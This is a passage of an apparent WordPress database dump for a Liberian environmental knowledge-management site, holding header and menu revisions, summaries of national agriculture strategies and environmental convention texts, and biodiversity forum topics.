href=\"https://ekmsliberia.info/events/\">Events</a></li></ul>\n</li><li id=\"menu-item-116\"><a href=\"https://ekmsliberia.info/contact/\">Contact</a></li></ul>\n			</nav><!-- #site-navigation -->\n					<!-- #site-navigation-wrap -->\n		<a href=\"#\">\n							Menu\n									Close\n						</a>\n	<!-- #oceanwp-mobile-menu-navbar -->\n	<nav itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n		<ul id=\"menu-main_menu-1\"><li><a href=\"https://ekmsliberia.info/\">Home</a></li>\n<li><a href=\"#\">Knowledge Resources</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>\n	<li><a href=\"https://ekmsliberia.info/related-topics/\">Related Topics</a></li>\n	<li><a href=\"https://ekmsliberia.info/institutions-resources/\">Institutions Resources</a></li>\n	<li><a href=\"https://ekmsliberia.info/documents-and-other-resources/\">Documents and Other Resources</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/discussion-forum/\">Discussion Forum</a></li>\n<li><a href=\"https://ekmsliberia.info/about/\">About</a></li>\n<li><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li>\n<li><a href=\"#\">Media</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/blogs-news-and-stories/\">Blogs, News and Stories</a></li>\n	<li><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>\n	<li><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li>\n</ul>\n</li>\n<li><a href=\"#\">Bulletin</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/vacancy/\">Vacancy</a></li>\n	<li><a href=\"https://ekmsliberia.info/events/\">Events</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/contact/\">Contact</a></li>\n</ul>\n	</nav>','Custom Header','','inherit','closed','closed','','30-revision-v1','','','2019-11-11 00:00:31','2019-11-11 00:00:31','',30,'https://ekmsliberia.info/30-revision-v1/',0,'revision','',0),(1756,1,'2019-11-11 00:02:32','2019-11-11 00:02:32','<a href=\"https://ekmsliberia.info/\" rel=\"home\"><img width=\"180\" height=\"98\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/Logo-e1573190685865.png\" alt=\"Environmental Knowledge Management System\" /></a>\n	<!-- #site-logo-inner -->\n<!-- #site-logo -->\n			<h2>Environmental Knowledge Management System</h2>		\n			<nav id=\"site-navigation\" itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n				<ul id=\"menu-main_menu\"><li id=\"menu-item-404\"><a href=\"https://ekmsliberia.info/\">Home</a></li><li id=\"menu-item-127\"><a href=\"#\">Knowledge Resources </a>\n<ul>\n	<li id=\"menu-item-125\"><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>	<li id=\"menu-item-117\"><a href=\"https://ekmsliberia.info/related-topics/\">Related Topics</a></li>	<li id=\"menu-item-123\"><a href=\"https://ekmsliberia.info/institutions-resources/\">Institutions Resources</a></li>	<li id=\"menu-item-120\"><a href=\"https://ekmsliberia.info/documents-and-other-resources/\">Documents and Other Resources</a></li></ul>\n</li><li id=\"menu-item-119\"><a href=\"https://ekmsliberia.info/discussion-forum/\">Discussion Forum</a></li><li id=\"menu-item-114\"><a href=\"https://ekmsliberia.info/about/\">About</a></li><li id=\"menu-item-118\"><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li><li id=\"menu-item-129\"><a href=\"#\">Media </a>\n<ul>\n	<li id=\"menu-item-115\"><a href=\"https://ekmsliberia.info/blogs-news-and-stories/\">Blogs, News and Stories</a></li>	<li id=\"menu-item-122\"><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>	<li id=\"menu-item-124\"><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li></ul>\n</li><li id=\"menu-item-128\"><a href=\"#\">Bulletin </a>\n<ul>\n	<li id=\"menu-item-126\"><a href=\"https://ekmsliberia.info/vacancy/\">Vacancy</a></li>	<li id=\"menu-item-121\"><a href=\"https://ekmsliberia.info/events/\">Events</a></li></ul>\n</li><li id=\"menu-item-116\"><a href=\"https://ekmsliberia.info/contact/\">Contact</a></li></ul>\n			</nav><!-- #site-navigation -->\n					<!-- #site-navigation-wrap -->\n		<a href=\"#\">\n							Menu\n									Close\n						</a>\n	<!-- #oceanwp-mobile-menu-navbar -->\n	<nav itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n		<ul id=\"menu-main_menu-1\"><li><a href=\"https://ekmsliberia.info/\">Home</a></li>\n<li><a href=\"#\">Knowledge Resources</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>\n	<li><a href=\"https://ekmsliberia.info/related-topics/\">Related Topics</a></li>\n	<li><a href=\"https://ekmsliberia.info/institutions-resources/\">Institutions Resources</a></li>\n	<li><a href=\"https://ekmsliberia.info/documents-and-other-resources/\">Documents and Other Resources</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/discussion-forum/\">Discussion Forum</a></li>\n<li><a href=\"https://ekmsliberia.info/about/\">About</a></li>\n<li><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li>\n<li><a href=\"#\">Media</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/blogs-news-and-stories/\">Blogs, News and Stories</a></li>\n	<li><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>\n	<li><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li>\n</ul>\n</li>\n<li><a href=\"#\">Bulletin</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/vacancy/\">Vacancy</a></li>\n	<li><a href=\"https://ekmsliberia.info/events/\">Events</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/contact/\">Contact</a></li>\n</ul>\n	</nav>','Custom Header','','inherit','closed','closed','','30-revision-v1','','','2019-11-11 00:02:32','2019-11-11 00:02:32','',30,'https://ekmsliberia.info/30-revision-v1/',0,'revision','',0),(1757,1,'2019-11-11 00:02:48','2019-11-11 00:02:48','<a href=\"https://ekmsliberia.info/\" rel=\"home\"><img width=\"180\" height=\"98\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/Logo-e1573190685865.png\" alt=\"Environmental Knowledge Management System\" /></a>\n	<!-- #site-logo-inner -->\n<!-- #site-logo -->\n			<h2>Environmental Knowledge Management System</h2>		\n			<nav id=\"site-navigation\" itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n				<ul id=\"menu-main_menu\"><li id=\"menu-item-404\"><a href=\"https://ekmsliberia.info/\">Home</a></li><li id=\"menu-item-127\"><a href=\"#\">Knowledge Resources </a>\n<ul>\n	<li id=\"menu-item-125\"><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>	<li id=\"menu-item-117\"><a href=\"https://ekmsliberia.info/related-topics/\">Related Topics</a></li>	<li id=\"menu-item-123\"><a href=\"https://ekmsliberia.info/institutions-resources/\">Institutions Resources</a></li>	<li id=\"menu-item-120\"><a href=\"https://ekmsliberia.info/documents-and-other-resources/\">Documents and Other Resources</a></li></ul>\n</li><li id=\"menu-item-119\"><a href=\"https://ekmsliberia.info/discussion-forum/\">Discussion Forum</a></li><li id=\"menu-item-114\"><a href=\"https://ekmsliberia.info/about/\">About</a></li><li id=\"menu-item-118\"><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li><li id=\"menu-item-129\"><a href=\"#\">Media </a>\n<ul>\n	<li id=\"menu-item-115\"><a href=\"https://ekmsliberia.info/blogs-news-and-stories/\">Blogs, News and Stories</a></li>	<li id=\"menu-item-122\"><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>	<li id=\"menu-item-124\"><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li></ul>\n</li><li id=\"menu-item-128\"><a href=\"#\">Bulletin </a>\n<ul>\n	<li id=\"menu-item-126\"><a href=\"https://ekmsliberia.info/vacancy/\">Vacancy</a></li>	<li id=\"menu-item-121\"><a href=\"https://ekmsliberia.info/events/\">Events</a></li></ul>\n</li><li id=\"menu-item-116\"><a href=\"https://ekmsliberia.info/contact/\">Contact</a></li></ul>\n			</nav><!-- #site-navigation -->\n					<!-- #site-navigation-wrap -->\n		<a href=\"#\">\n							Menu\n									Close\n						</a>\n	<!-- #oceanwp-mobile-menu-navbar -->\n	<nav itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n		<ul id=\"menu-main_menu-1\"><li><a href=\"https://ekmsliberia.info/\">Home</a></li>\n<li><a href=\"#\">Knowledge Resources</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>\n	<li><a href=\"https://ekmsliberia.info/related-topics/\">Related Topics</a></li>\n	<li><a href=\"https://ekmsliberia.info/institutions-resources/\">Institutions Resources</a></li>\n	<li><a href=\"https://ekmsliberia.info/documents-and-other-resources/\">Documents and Other Resources</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/discussion-forum/\">Discussion Forum</a></li>\n<li><a href=\"https://ekmsliberia.info/about/\">About</a></li>\n<li><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li>\n<li><a href=\"#\">Media</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/blogs-news-and-stories/\">Blogs, News and Stories</a></li>\n	<li><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>\n	<li><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li>\n</ul>\n</li>\n<li><a href=\"#\">Bulletin</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/vacancy/\">Vacancy</a></li>\n	<li><a href=\"https://ekmsliberia.info/events/\">Events</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/contact/\">Contact</a></li>\n</ul>\n	</nav>','Custom Header','','inherit','closed','closed','','30-revision-v1','','','2019-11-11 00:02:48','2019-11-11 00:02:48','',30,'https://ekmsliberia.info/30-revision-v1/',0,'revision','',0),(1758,1,'2019-11-11 00:03:49','2019-11-11 00:03:49','<a href=\"https://ekmsliberia.info/\" rel=\"home\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/Logo-e1573190685865.png\" alt=\"Environmental Knowledge Management System\" width=\"180\" height=\"98\" /></a>\r\n<!-- #site-logo-inner -->\r\n<!-- #site-logo -->\r\n<h2>Environmental Knowledge Management System</h2>\r\n<nav id=\"site-navigation\">\r\n<ul id=\"menu-main_menu\">\r\n 	<li id=\"menu-item-404\"><a href=\"https://ekmsliberia.info/\">Home</a></li>\r\n 	<li id=\"menu-item-127\"><a href=\"#\">Knowledge Resources </a>\r\n<ul>\r\n 	<li id=\"menu-item-125\"><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>\r\n 	<li id=\"menu-item-117\"><a href=\"https://ekmsliberia.info/related-topics/\">Related Topics</a></li>\r\n 	<li id=\"menu-item-123\"><a href=\"https://ekmsliberia.info/institutions-resources/\">Institutions Resources</a></li>\r\n 	<li id=\"menu-item-120\"><a href=\"https://ekmsliberia.info/documents-and-other-resources/\">Documents and Other Resources</a></li>\r\n</ul>\r\n</li>\r\n 	<li id=\"menu-item-119\"><a href=\"https://ekmsliberia.info/discussion-forum/\">Discussion Forum</a></li>\r\n 	<li id=\"menu-item-114\"><a href=\"https://ekmsliberia.info/about/\">About</a></li>\r\n 	<li id=\"menu-item-118\"><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li>\r\n 	<li id=\"menu-item-129\"><a href=\"#\">Media </a>\r\n<ul>\r\n 	<li id=\"menu-item-115\"><a href=\"https://ekmsliberia.info/blogs-news-and-stories/\">Blogs, News and Stories</a></li>\r\n 	<li id=\"menu-item-122\"><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>\r\n 	<li id=\"menu-item-124\"><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li>\r\n</ul>\r\n</li>\r\n 	<li id=\"menu-item-128\"><a href=\"#\">Bulletin </a>\r\n<ul>\r\n 	<li id=\"menu-item-126\"><a href=\"https://ekmsliberia.info/vacancy/\">Vacancy</a></li>\r\n 	<li id=\"menu-item-121\"><a href=\"https://ekmsliberia.info/events/\">Events</a></li>\r\n</ul>\r\n</li>\r\n 	<li id=\"menu-item-116\"><a href=\"https://ekmsliberia.info/contact/\">Contact</a></li>\r\n</ul>\r\n</nav><!-- #site-navigation -->\r\n<!-- #site-navigation-wrap -->\r\n<a href=\"#\">\r\nMenu\r\nClose\r\n</a>\r\n<!-- #oceanwp-mobile-menu-navbar -->\r\n\r\n<nav>\r\n<ul id=\"menu-main_menu-1\">\r\n 	<li><a href=\"https://ekmsliberia.info/\">Home</a></li>\r\n 	<li><a href=\"#\">Knowledge Resources</a>\r\n<ul>\r\n 	<li><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>\r\n 	<li><a href=\"https://ekmsliberia.info/related-topics/\">Related Topics</a></li>\r\n 	<li><a href=\"https://ekmsliberia.info/institutions-resources/\">Institutions Resources</a></li>\r\n 	<li><a href=\"https://ekmsliberia.info/documents-and-other-resources/\">Documents and Other Resources</a></li>\r\n</ul>\r\n</li>\r\n 	<li><a href=\"https://ekmsliberia.info/discussion-forum/\">Discussion Forum</a></li>\r\n 	<li><a href=\"https://ekmsliberia.info/about/\">About</a></li>\r\n 	<li><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li>\r\n 	<li><a href=\"#\">Media</a>\r\n<ul>\r\n 	<li><a href=\"https://ekmsliberia.info/blogs-news-and-stories/\">Blogs, News and Stories</a></li>\r\n 	<li><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>\r\n 	<li><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li>\r\n</ul>\r\n</li>\r\n 	<li><a href=\"#\">Bulletin</a>\r\n<ul>\r\n 	<li><a href=\"https://ekmsliberia.info/vacancy/\">Vacancy</a></li>\r\n 	<li><a href=\"https://ekmsliberia.info/events/\">Events</a></li>\r\n</ul>\r\n</li>\r\n 	<li><a href=\"https://ekmsliberia.info/contact/\">Contact</a></li>\r\n</ul>\r\n</nav>','Custom Header','','inherit','closed','closed','','30-revision-v1','','','2019-11-11 00:03:49','2019-11-11 00:03:49','',30,'https://ekmsliberia.info/30-revision-v1/',0,'revision','',0),(1761,1,'2019-11-11 00:21:47','2019-11-11 00:21:47','','ESIA Process','','publish','closed','closed','','esia-process','','','2019-11-14 13:22:48','2019-11-14 13:22:48','',0,'https://ekmsliberia.info/?p=1761',2,'nav_menu_item','',0),(1762,1,'2019-11-11 00:21:47','2019-11-11 00:21:47','','EPA Official Site','','publish','closed','closed','','epa-official-site','','','2019-11-14 13:22:48','2019-11-14 13:22:48','',0,'https://ekmsliberia.info/?p=1762',1,'nav_menu_item','',0),(1763,1,'2019-11-11 00:29:01','2019-11-11 00:29:01','','FDA Official Site','','publish','closed','closed','','fda-official-site','','','2019-11-14 16:13:08','2019-11-14 16:13:08','',0,'https://ekmsliberia.info/?p=1763',1,'nav_menu_item','',0),(1764,1,'2019-11-11 00:29:02','2019-11-11 00:29:02','','FDA Projects','','publish','closed','closed','','forest-atlas-of-liberia','','','2019-11-14 16:13:08','2019-11-14 16:13:08','',0,'https://ekmsliberia.info/?p=1764',2,'nav_menu_item','',0),(1766,1,'2019-11-11 01:37:41','2019-11-11 01:37:41','The final draft of the Cassava Sector Strategy was validated in July 2010 during a meeting attended by all the stakeholders in the value chain.\r\n\r\nIn Liberia, Cassava is the second most important food crop. It is grown throughout the country, although the area covered may vary considerably for different counties. A survey conducted by the Liberian Ministry of Agriculture in 1978 indicated that the total area covered by the crop in 1977 was only 86 000 ha with an average yield of 1800 kg/ha, and that 39 400 or 26 percent of all agricultural households in the country were involved in the production of cassava.','Liberia National Cassava Sector Strategy','','publish','closed','closed','','liberia-national-cassava-sector-strategy','','','2022-12-06 10:35:25','2022-12-06 10:35:25','',0,'https://ekmsliberia.info/?post_type=document&#038;p=1766',155,'document','',0),(1767,1,'2019-11-11 01:35:50','2019-11-11 01:35:50','','Liberia National Cassava Development Strategy_Final','','inherit','open','closed','','liberia-national-cassava-development-strategy_final','','','2019-11-11 01:35:50','2019-11-11 01:35:50','',1766,'https://ekmsliberia.info/wp-content/uploads/2019/11/Liberia-National-Cassava-Development-Strategy_Final.doc',0,'attachment','application/msword',0),(1768,1,'2019-11-11 01:40:25','2019-11-11 01:40:25','Read all the Ministry of Agriculture (MOA) Chemical Policies, guides, and Reports.','Chemical Policy Documents','','publish','closed','closed','','chemical-policy-documents','','','2022-12-06 10:48:06','2022-12-06 10:48:06','',0,'https://ekmsliberia.info/?post_type=document&#038;p=1768',154,'document','',0),(1769,1,'2019-11-11 01:39:47','2019-11-11 01:39:47','','Chemical Policy Documents','','inherit','open','closed','','chemical-policy-documents','','','2019-11-11 01:39:47','2019-11-11 01:39:47','',1768,'https://ekmsliberia.info/wp-content/uploads/2019/11/Chemical-Policy-Documents.zip',0,'attachment','application/zip',0),(1770,1,'2019-11-11 01:44:21','2019-11-11 01:44:21','With the publication of this Food Security and Nutrition Strategy (FSNS), the\r\ngovernment of the Republic of Liberia declares the commitments it will undertake and the\r\nactivities that it will put in motion to substantially reduce food insecurity and improve\r\nnutrition in the country in the next eight years. Government recognizes that to further its\r\nambitions of peace, reconciliation, stability, and development, the nation as a whole and each Liberian household must achieve food security and improved nutrition. Certainly, the\r\nLiberian economy rests heavily on the food security and the nutritional well-being of its\r\ncitizens. By ensuring that all its citizens have reliable physical and economic access to\r\nsufficient safe and nutritious food to meet their dietary needs and food preferences,\r\ngovernment will be laying a strong foundation for not only a prosperous nation, but also a\r\nmore peaceful and secure nation.\r\n\r\nThe key objectives of the FSNS are to make certain that all Liberians have reliable access\r\nto the food they need and are able to utilize that food to live active and healthy lives. As\r\nsuch, ensuring food security and good nutrition is not a policy choice of government that it\r\ncan decide to accept or reject, but a right of the citizens of Liberia which the government is obligated to respect, promote, and protect.','National Food Security and Nutrition Strategy','','publish','closed','closed','','national-food-security-and-nutrition-strategy','','','2022-12-06 10:47:32','2022-12-06 10:47:32','',0,'https://ekmsliberia.info/?post_type=document&#038;p=1770',153,'document','',0),(1771,1,'2019-11-11 01:43:31','2019-11-11 01:43:31','','National Food Security and Nutrition Strategy_Mar08_1','','inherit','open','closed','','national-food-security-and-nutrition-strategy_mar08_1','','','2019-11-11 01:43:31','2019-11-11 01:43:31','',1770,'https://ekmsliberia.info/wp-content/uploads/2019/11/National-Food-Security-and-Nutrition-Strategy_Mar08_1.pdf',0,'attachment','application/pdf',0),(1772,1,'2019-11-11 01:49:36','2019-11-11 01:49:36','The Comprehensive Assessment of the Agricultural Sector of Liberia (CAAS-Lib) was launched by the Government of Liberia, with assistance from the Food and Agriculture Organization of the United Nations (FAO), the World Bank and the International Fund for Agricultural Development (IFAD), to provide a vision and policy and programme options for the agricultural sector and for food security, and also to help the sector institutions prepare themselves for the transition to nation-building after nearly 14 years of war and destruction of life and property. The review comes at a time of transition from war to peace and nation building by the recent process of democratic elections and also the Millennium Development Goal (MDG) that calls for halving of the number of poor and hungry people by 2015.\r\n\r\nAs a sub-sector report contributing to the overall review, the main tasks of this study are to: review information on the resource base and analyse the land and water sector data, bearing in mind the environmental issues; review past and present water development and management projects with regard to water control and soil conservation; analyse options for development of water and soil conservation projects as priority investments; review planned overlapping activities in the sector and formulate implementation strategies.','Comprehensive Assessment of the Agriculture Sector in Liberia','','publish','closed','closed','','comprehensive-assessment-of-the-agriculture-sector-in-liberia','','','2022-12-06 10:46:57','2022-12-06 10:46:57','',0,'https://ekmsliberia.info/?post_type=document&#038;p=1772',152,'document','',0),(1773,1,'2019-11-11 01:49:08','2019-11-11 01:49:08','','CAAS-LIB','','inherit','open','closed','','caas-lib','','','2019-11-11 01:49:08','2019-11-11 01:49:08','',1772,'https://ekmsliberia.info/wp-content/uploads/2019/11/CAAS-LIB.pdf',0,'attachment','application/pdf',0),(1774,1,'2019-11-11 01:52:30','2019-11-11 01:52:30','Land in Liberia’s humid subtropics is particularly well suited to cocoa, a crop for which strong demand has been consistently forecast since the early 1990s. Solid prices for this export crop are projected to accompany growth in demand until at least 2030.\r\n\r\nLiberia enjoys two complementary assets with a potential for phenomenal growth once properly leveraged: fertile land and experienced cocoa farmers. Currently both assets are undervalued and captive to trends in under investment. Where farmers previously managed cocoa farms as businesses, ageing non-productive trees and a deterioration of trust in value chain participants has obliged farmers to favor subsistence agriculture over cocoa cultivation.\r\n\r\nThe Government of Liberia’s Ministry of Agriculture proposes that cocoa farmers revitalize the sector following various reforms such as market liberalization. This National Development Cocoa Strategy proposes Ministry-led, ways and means of reducing poverty through cocoa cultivation, and increasing food security in rural areas by tripling real income received from cocoa over the next five to eight years.','National Cocoa Development Strategy','','publish','closed','closed','','national-cocoa-development-strategy','','','2022-12-06 10:46:01','2022-12-06 10:46:01','',0,'https://ekmsliberia.info/?post_type=document&#038;p=1774',151,'document','',0),(1775,1,'2019-11-11 01:51:58','2019-11-11 01:51:58','','NCDS_Final_2012','','inherit','open','closed','','ncds_final_2012','','','2019-11-11 01:51:58','2019-11-11 01:51:58','',1774,'https://ekmsliberia.info/wp-content/uploads/2019/11/NCDS_Final_2012.doc',0,'attachment','application/msword',0),(1776,1,'2019-11-11 01:57:54','2019-11-11 01:57:54','The objectives of this Convention, to be pursued in accordance with its relevant provisions, are the conservation of biological diversity, the sustainable use of its components and the fair and equitable sharing of the benefits arising out of the utilization of genetic resources, including by appropriate access to genetic resources and by appropriate transfer of relevant technologies, taking into account all rights over those resources and to technologies, and by appropriate funding.','Convention Text - UNCBD','','publish','closed','closed','','convention-text-uncbd','','','2022-12-06 10:45:42','2022-12-06 10:45:42','',0,'https://ekmsliberia.info/?post_type=document&#038;p=1776',150,'document','',0),(1777,1,'2019-11-11 01:56:35','2019-11-11 01:56:35','','uncbd_convention_en','','inherit','open','closed','','uncbd_convention_en','','','2019-11-11 01:56:35','2019-11-11 01:56:35','',1776,'https://ekmsliberia.info/wp-content/uploads/2019/11/uncbd_convention_en.pdf',0,'attachment','application/pdf',0),(1778,1,'2019-11-11 02:10:02','2019-11-11 02:10:02','Established in 1994, the United Nations Convention to Combat Desertification (UNCCD) is the sole legally binding international agreement linking environment and development to sustainable land management. The Convention addresses specifically the arid, semi-arid and dry sub-humid areas, known as the drylands, where some of the most vulnerable ecosystems and peoples can be found.','Convention Text - UNCCD','','publish','closed','closed','','convention-text-unccd','','','2022-12-06 10:45:22','2022-12-06 10:45:22','',0,'https://ekmsliberia.info/?post_type=document&#038;p=1778',149,'document','',0),(1779,1,'2019-11-11 02:09:15','2019-11-11 02:09:15','','unccd_convention_en','','inherit','open','closed','','unccd_convention_en','','','2019-11-11 02:09:15','2019-11-11 02:09:15','',1778,'https://ekmsliberia.info/wp-content/uploads/2019/11/unccd_convention_en.pdf',0,'attachment','application/pdf',0),(1780,1,'2019-11-11 02:14:14','2019-11-11 02:14:14','The UNFCCC entered into force on 21 March 1994. Today, it has near-universal membership. The 197 countries that have ratified the Convention are called Parties to the Convention.\r\n\r\nThe UNFCCC is a “Rio Convention”, one of three adopted at the “Rio Earth Summit” in 1992. Its sister Rio Conventions are the UN Convention on Biological Diversity and the Convention to Combat Desertification. The three are intrinsically linked. It is in this context that the Joint Liaison Group was set up to boost cooperation among the three Conventions, with the ultimate aim of developing synergies in their activities on issues of mutual concern. It now also incorporates the Ramsar Convention on Wetlands.\r\n\r\nPreventing “dangerous” human interference with the climate system is the ultimate aim of the UNFCCC.','Convention Text - UNFCCC','','publish','closed','closed','','convention-text-unfccc','','','2022-12-06 10:44:59','2022-12-06 10:44:59','',0,'https://ekmsliberia.info/?post_type=document&#038;p=1780',148,'document','',0),(1781,1,'2019-11-11 02:13:45','2019-11-11 02:13:45','','unfccc_convention_text_with_annexes_en','','inherit','open','closed','','unfccc_convention_text_with_annexes_en','','','2019-11-11 02:13:45','2019-11-11 02:13:45','',1780,'https://ekmsliberia.info/wp-content/uploads/2019/11/unfccc_convention_text_with_annexes_en.pdf',0,'attachment','application/pdf',0),(1782,1,'2019-11-11 02:20:08','2019-11-11 02:20:08','This publication on the occasion of the Rio+20 Conference highlights the roles of the Rio Conventions’ processes involved in biodiversity, combating desertification/land degradation and climate change as important contributors to the global sustainable development agenda, drawing attention to successes and future opportunities.','The RIO Conventions Action on ADAPTATION','','publish','closed','closed','','the-rio-conventions-action-on-adaptation','','','2022-12-06 11:03:17','2022-12-06 11:03:17','',0,'https://ekmsliberia.info/?post_type=document&#038;p=1782',147,'document','',0),(1783,1,'2019-11-11 02:19:41','2019-11-11 02:19:41','','rio_20_adaptation_brochure','','inherit','open','closed','','rio_20_adaptation_brochure','','','2019-11-11 02:19:41','2019-11-11 02:19:41','',1782,'https://ekmsliberia.info/wp-content/uploads/2019/11/rio_20_adaptation_brochure.pdf',0,'attachment','application/pdf',0),(1784,1,'2019-11-11 02:24:13','2019-11-11 02:24:13','','Documents Database','','inherit','closed','closed','','91-revision-v1','','','2019-11-11 02:24:13','2019-11-11 02:24:13','',91,'https://ekmsliberia.info/91-revision-v1/',0,'revision','',0),(1785,1,'2019-11-11 02:33:13','2019-11-11 02:33:13','https://ekmsliberia.info/wp-content/uploads/2019/11/posts-table-pro.zip','posts-table-pro.zip','','private','open','closed','','posts-table-pro-zip','','','2019-11-11 02:33:13','2019-11-11 02:33:13','',0,'https://ekmsliberia.info/wp-content/uploads/2019/11/posts-table-pro.zip',0,'attachment','',0),(1787,1,'2019-11-11 14:52:00','2019-11-11 14:52:00',' ','','','publish','closed','closed','','1787','','','2019-11-20 10:42:17','2019-11-20 10:42:17','',0,'https://ekmsliberia.info/?p=1787',1,'nav_menu_item','',0),(1788,1,'2019-11-11 14:52:00','2019-11-11 14:52:00',' ','','','publish','closed','closed','','1788','','','2019-11-20 10:42:17','2019-11-20 10:42:17','',0,'https://ekmsliberia.info/?p=1788',3,'nav_menu_item','',0),(1790,1,'2019-11-11 14:52:00','2019-11-11 14:52:00',' ','','','publish','closed','closed','','1790','','','2019-11-20 10:42:17','2019-11-20 10:42:17','',0,'https://ekmsliberia.info/?p=1790',4,'nav_menu_item','',0),(1791,1,'2019-11-11 15:23:51','2019-11-11 15:23:51','','MEA Projects','','publish','closed','closed','','mea-projects','','','2019-11-14 13:22:48','2019-11-14 13:22:48','',0,'https://ekmsliberia.info/?p=1791',3,'nav_menu_item','',0),(1796,1,'2019-11-05 09:25:49','2019-11-05 09:25:49','Forest biological diversity is a broad term that refers to all life forms found within forested areas and the ecological roles they perform. As such, forest biological diversity encompasses not just trees, but the multitude of plants, animals and micro-organisms that inhabit forest areas and their associated genetic diversity.','Forest Biodiversity','','publish','closed','closed','','forest-biodiversity','','','2019-11-05 09:25:49','2019-11-05 09:25:49','',0,'https://ekmsliberia.info/forums/topic/forest-biodiversity/',0,'topic','',0),(1797,1,'2019-11-05 09:32:58','2019-11-05 09:32:58','The oceans cover 70% of the planet’s surface area, and marine and coastal environments contain diverse habitats that support an abundance of marine life. Life in our seas produces a third of the oxygen that we breathe, offers a valuable source of protein and moderates global climatic change.','Marine and Coastal Biodiversity','','publish','closed','closed','','marine-and-coastal-biodiversity','','','2019-11-14 19:49:52','2019-11-14 19:49:52','',0,'https://ekmsliberia.info/forums/topic/marine-and-coastal-biodiversity/',0,'topic','',0),(1798,1,'2019-11-05 09:38:48','2019-11-05 09:38:48','“Inland waters” are aquatic-influenced environments located within land boundaries. This includes those located in coastal areas, even where adjacent to marine environments. Inland water systems can be fresh, saline or a mix of the two (brackishwater). Terminology can confuse: inland water bodies include the Caspian Sea (freshwater) and the Dead Sea (hyper-saline), whereas the Baltic Sea (also largely freshwater) would be excluded by some.','Inland Waters Biodiversity','','publish','closed','closed','','inland-waters-biodiversity','','','2019-11-14 19:49:52','2019-11-14 19:49:52','',0,'https://ekmsliberia.info/forums/topic/inland-waters-biodiversity/',0,'topic','',0),(1799,1,'2019-11-05 09:38:49','2019-11-05 09:38:49','“Inland waters” are aquatic-influenced environments located within land boundaries. This includes those located in coastal areas, even where adjacent to marine environments. Inland water systems can be fresh, saline or a mix of the two (brackishwater). Terminology can confuse: inland water bodies include the Caspian Sea (freshwater) and the Dead Sea (hyper-saline), whereas the Baltic Sea (also largely freshwater) would be excluded by some.','Inland Waters Biodiversity','','publish','closed','closed','','inland-waters-biodiversity-2','','','2019-11-14 19:49:52','2019-11-14 19:49:52','',0,'https://ekmsliberia.info/forums/topic/inland-waters-biodiversity-2/',0,'topic','',0),(1800,1,'2019-11-05 09:40:26','2019-11-05 09:40:26','Agricultural biodiversity is the outcome of the interactions among genetic resources, the environment and the management systems and practices used by farmers. This is the result of both natural selection and human inventive developed over millennia.','Agricultural Biodiversity','','publish','closed','closed','','agricultural-biodiversity','','','2019-11-14 19:49:52','2019-11-14 19:49:52','',0,'https://ekmsliberia.info/forums/topic/agricultural-biodiversity/',0,'topic','',0),(1801,1,'2019-11-05 09:42:03','2019-11-05 09:42:03','Many mountain ecosystems are host to higher species richness and levels of endemism than adjacent lowlands. Mountains at lower altitudes can support exceptional biodiversity, due to compression of a wide range of ecosystems into a relatively short distance. Mountains also often provide islands of suitable habitat, isolated from unfavorable surrounding lowlands.','Mountain Biodiversity','','publish','closed','closed','','mountain-biodiversity','','','2019-11-14 19:49:52','2019-11-14 